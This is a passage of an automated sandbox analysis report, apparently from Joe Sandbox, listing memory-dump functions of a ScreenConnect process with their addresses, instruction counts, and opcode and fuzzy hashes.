                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F51E134F00214DFDB259B68D858BAEBBF2BF84340F14856DE886DB292DB759C45CB84
                                                                                                                                                                                                                                                        Function 01073668 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8e9983bfbe4db4c5d972103455f2ee9e72e6501d720c00b5ef07487cd268f771
                                                                                                                                                                                                                                                        • Instruction ID: 98a65553f390189493343d56c51059d7953821b324c5d6579ed2796729d70524
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e9983bfbe4db4c5d972103455f2ee9e72e6501d720c00b5ef07487cd268f771
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2451A474B007058FEB70CF29D84466ABBF1FF88320B148669D496DB7A1DB31E946CB94
                                                                                                                                                                                                                                                        Function 01077770 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a7b35f8e52ccc289caca7a2115959522c24ec97af46a11469d2ebe84d66d4b86
                                                                                                                                                                                                                                                        • Instruction ID: 12e77d6cd22b6fd84ba8101490df7f37976cfab9035542b566d7e586e37bc429
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7b35f8e52ccc289caca7a2115959522c24ec97af46a11469d2ebe84d66d4b86
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3518B70E003099FDB41EFB4D844BDEBBB2FF89300F50855AE005AB291EB74A986CB50
                                                                                                                                                                                                                                                        Function 01074940 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: dcd6e5f339c2ee58648c66ccbe6139a83109fd4608acfd91ebd78c07e1b726fd
                                                                                                                                                                                                                                                        • Instruction ID: b9f7f5b480deff4800893e9e50bdd438e600c5dbd0cf1b631701e337e24b32d8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dcd6e5f339c2ee58648c66ccbe6139a83109fd4608acfd91ebd78c07e1b726fd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50511734600B05CFD724DF29D884A26B7F2FF8D224B248A5CD596DB7A4DB71E841CB58
                                                                                                                                                                                                                                                        Function 010742F0 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2a19353c6a4bb3e6e8c78c58c5968e453addccff1cfcce2d58ef1f1f26e02723
                                                                                                                                                                                                                                                        • Instruction ID: 1aaba9098f7d635d7d632a9d1f0cfc5317591a0d1bc83949c1485f337ee904f7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a19353c6a4bb3e6e8c78c58c5968e453addccff1cfcce2d58ef1f1f26e02723
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5841C031E006098BEB15EF68E894B6DBBB6EF84310F04C159D90A9F346DF7498469BA1
                                                                                                                                                                                                                                                        Function 01073678 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 980737ed80a8e4e9bfceee3c4f7fa8d7e713ababdadbed2e00d0e2e3f451857e
                                                                                                                                                                                                                                                        • Instruction ID: 71b93f480717e005be360b1de500672dbf6ce5e3c1a65a333f5f430e55a92e2d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 980737ed80a8e4e9bfceee3c4f7fa8d7e713ababdadbed2e00d0e2e3f451857e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D416D74A007098FEB74DF29D844A5AB7F1FF88310B108A68D496DB7A1DB70E845CF95
                                                                                                                                                                                                                                                        Function 01076216 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: dc311b76bad1f3d2e64f2b60455905e701f559c51b7aab3bef4867b0890d3340
                                                                                                                                                                                                                                                        • Instruction ID: 0fc0d790ea77f2439fbf1c8fe630dab316f7a134b29adab452ca6e7e7325fb91
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc311b76bad1f3d2e64f2b60455905e701f559c51b7aab3bef4867b0890d3340
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B418830B106058FDB54DB39D894AADBBF2BF88610B1081ADE447EB3A0DF719C05CB91
                                                                                                                                                                                                                                                        Function 01073DC0 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: bd27a7b5bf749168748811bd99422a15df9a2a11903e484f0ab5ede4875d0ad1
                                                                                                                                                                                                                                                        • Instruction ID: b486f53cb4e49fbb2b4a5a172bfe98d405b82d792422ff15d747b9d375dc1395
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd27a7b5bf749168748811bd99422a15df9a2a11903e484f0ab5ede4875d0ad1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E318B31B002058BEB149FA9D498BAFF7F6EF89314F149869D506EB790DBB19C009B94
                                                                                                                                                                                                                                                        Function 01073828 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 342511768c3d88f16a5ee8274caddde5f4a48c68c4ce089aad8112d47b7df073
                                                                                                                                                                                                                                                        • Instruction ID: 9bddcac0f26c7e72d2b30c46fc394cd5ff05253f76da611226f970f66aab2036
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 342511768c3d88f16a5ee8274caddde5f4a48c68c4ce089aad8112d47b7df073
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88310370F002498FDB45DBA8D8506AEFBB2FFC9200B1480BAD448DB382DB319D02CB95
                                                                                                                                                                                                                                                        Function 01075548 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4b76d89b6b9966b8c33cadadb8b9019be044259d2a51152fad6891eb3b31d7a1
                                                                                                                                                                                                                                                        • Instruction ID: c09b7e0f9e644205464cd6f318d0dc2ab01220ae834066ca90ea0879426a2612
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b76d89b6b9966b8c33cadadb8b9019be044259d2a51152fad6891eb3b31d7a1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF314A30A00705CFC760DF29D884AAAB7F2EF89320B144A5CD596CB7A1DB30E945CB91
                                                                                                                                                                                                                                                        Function 01075FB7 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: dae672411c4125f998c4623c479bb09248868b0653045f16d5f7ba19acbd25fc
                                                                                                                                                                                                                                                        • Instruction ID: 32134010bf2bf022f47ab6819fac486d0e59ba10315f759fbbda9a6f3faa92e3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dae672411c4125f998c4623c479bb09248868b0653045f16d5f7ba19acbd25fc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A112632B00A015FD351D62C9D51BA7BBE79FC6650B69C5A9F099CB241EA32DC028390
                                                                                                                                                                                                                                                        Function 010750C1 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a7ca3e89421f0c6288db2557ff6489242983f57e8c28e43019bd08b6ecbf7972
                                                                                                                                                                                                                                                        • Instruction ID: 5a157cc724ba328a1bb901ff0e578581857dc5368055c7a74c9459e889142bc4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7ca3e89421f0c6288db2557ff6489242983f57e8c28e43019bd08b6ecbf7972
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8221D5717402055BE700EB78EC51B6E7BE2EFC5240F04C529E459AB351DF74AD069BE2
                                                                                                                                                                                                                                                        Function 01074B70 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f5222b619fd4a0d592ad4039f5de4b4984cf58e02dfecae1394d01d112fc8b7f
                                                                                                                                                                                                                                                        • Instruction ID: 357a477535c863211290daa90ee40dc2f5e4db6c8b62458533220a47a3bbca6e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5222b619fd4a0d592ad4039f5de4b4984cf58e02dfecae1394d01d112fc8b7f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C2151316007098FD774CF69C84869ABBF1EF44320B108B6CD5929B6A1DB71E989CF90
                                                                                                                                                                                                                                                        Function 010750D0 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: acba1eba09e70d5d40dc9666570cab9b4886f6d144eede10f3857590dffe6157
                                                                                                                                                                                                                                                        • Instruction ID: 1b4ea1f89b7a561a74b2e33c53dbb5281e2ba2d04ed3f508a0288b470ddbd518
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: acba1eba09e70d5d40dc9666570cab9b4886f6d144eede10f3857590dffe6157
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD11E271B402055BE700FB68EC41B6EB7E6EFC5250F40C529E509AB350DF70AE059BE2
                                                                                                                                                                                                                                                        Function 01076E42 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: f904dcf80e52cfd3025bfc0742f2eae9418373dda31080436f82035b7f1f585c
                                                                                                                                                                                                                                                        • Instruction ID: 24ecaf10a1e2ce2c5bc82e78bce15fdc3b9886bfacd27841864aa36983e95627
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f904dcf80e52cfd3025bfc0742f2eae9418373dda31080436f82035b7f1f585c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6110632F093514FCB028B78D8944AABFF4EF8624431589EBC046CB263DBB19C078794
                                                                                                                                                                                                                                                        Function 01074F40 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c8d89c96415b98ea1219460e464b345e2952eaea379e44493d198096477781eb
                                                                                                                                                                                                                                                        • Instruction ID: ff2fc4f8103f7876112fc184bc36872830f15fdd1f17f2351be11b0d9dd071eb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8d89c96415b98ea1219460e464b345e2952eaea379e44493d198096477781eb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E01186329012099FCF01DFA4D9419DEBFF1EF49304B118455D508BB261D771AA06CB90
                                                                                                                                                                                                                                                        Function 01075035 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0d7eb1cba259387720b66132d58ad45ece1cc1f1bf2879817fb58dc7929e785f
                                                                                                                                                                                                                                                        • Instruction ID: 9fea07a6d87581bf1caf23dd9c4d79c1d77c7f3f686fcc0342d2d3ac1cb64bcc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d7eb1cba259387720b66132d58ad45ece1cc1f1bf2879817fb58dc7929e785f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E61146319001499BDB02DFA8D884ADCBBB2BF85204F59C554E045AB126DB71A986CBE1
                                                                                                                                                                                                                                                        Function 01074F50 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4721a7bfa1f93f3abdaec32f0b010f585542ffcaa7207ed3f7cda73f76e0d6f4
                                                                                                                                                                                                                                                        • Instruction ID: e408ef38bce421750709a755d05751caeb3848e421f89e77147343540ae3150c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4721a7bfa1f93f3abdaec32f0b010f585542ffcaa7207ed3f7cda73f76e0d6f4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F011163590120A9FDF00DFA4D9409DEBBF5FF49314B108559D509BB261D771AA06CB91
                                                                                                                                                                                                                                                        Function 01071828 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 94714d679503824f78a96ca4231e1653d484c20192c0e9b8935f0d830c55ddc8
                                                                                                                                                                                                                                                        • Instruction ID: 8ca1076749e4ed805c4b061e9753451055b4efe4f9656ceb74d296e7f3643312
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 94714d679503824f78a96ca4231e1653d484c20192c0e9b8935f0d830c55ddc8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D401DF30A09248CFC7869B78D8199297FF2EF4611131580EBE486CB2A2DB359C02CB15
                                                                                                                                                                                                                                                        Function 01074FD0 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4a940986f38150b920a668b2f2bdbdb64837411bf7bda3c991a3654a3f4338d7
                                                                                                                                                                                                                                                        • Instruction ID: 380a045143a4664d4231c140f3b82b1b6c1584097aea25d8a16a9b92468b2abd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a940986f38150b920a668b2f2bdbdb64837411bf7bda3c991a3654a3f4338d7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D018C32D012599BDB04DFB8E8049DDBFB2EF89300F09852AE44577220DB716956CB90
                                                                                                                                                                                                                                                        Function 00FCD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1750321186.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_fcd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2d807d076620dfa6b6882a1c64c01bd252d6e259f2e4b6ed6588e26be1288854
                                                                                                                                                                                                                                                        • Instruction ID: de96ab69a87fe59f6970ae186991c37441ae0ef9d29f95ffafcedd032ef9512d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d807d076620dfa6b6882a1c64c01bd252d6e259f2e4b6ed6588e26be1288854
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 590120714443419FE7104E19CD81F6BBB98EF41334F18C43DED450F146C2759845D6B1
                                                                                                                                                                                                                                                        Function 00FCD005 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1750321186.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_fcd000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 266d1da07cc348e5aca604716831e0949cc006f41e360ccfe1133d7f5f1eb543
                                                                                                                                                                                                                                                        • Instruction ID: e5d8e81353c3a65571dba32e7346f53ca3aa08617677528c11f68345bd7344eb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 266d1da07cc348e5aca604716831e0949cc006f41e360ccfe1133d7f5f1eb543
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D801406140E3C05FD7128B258D94B56BFB4EF53224F1981DBE9888F1A7C2695849C772
                                                                                                                                                                                                                                                        Function 01078168 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: bc9e3c642bba172bf809e074d7bd0788f54fd9bfbfae784cc014b407e477391d
                                                                                                                                                                                                                                                        • Instruction ID: 5812f87472f6a2e6a4ec2afc899a1889a1934f57c8d903271af3c01a7465bd90
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc9e3c642bba172bf809e074d7bd0788f54fd9bfbfae784cc014b407e477391d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0CF08C77B0C2046FD728CABEA40069BBBDEDBC4220B14C07FE59DC3781E931A5008768
                                                                                                                                                                                                                                                        Function 01078157 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a89dc99842eaaffc2bcfdbc706c660e4f36623acee6830feb9db7daa4b939bef
                                                                                                                                                                                                                                                        • Instruction ID: 4de3f378e40f8417f65f9a8041e46c469a26df8b490fb0f4de18c2f05ae1ec14
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a89dc99842eaaffc2bcfdbc706c660e4f36623acee6830feb9db7daa4b939bef
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83F0EC76A0D3C06FC326877968115ABAFEACEC2220B09C0BFD0C8C3282E8205912C325
                                                                                                                                                                                                                                                        Function 010712A0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1751084286.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_1070000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
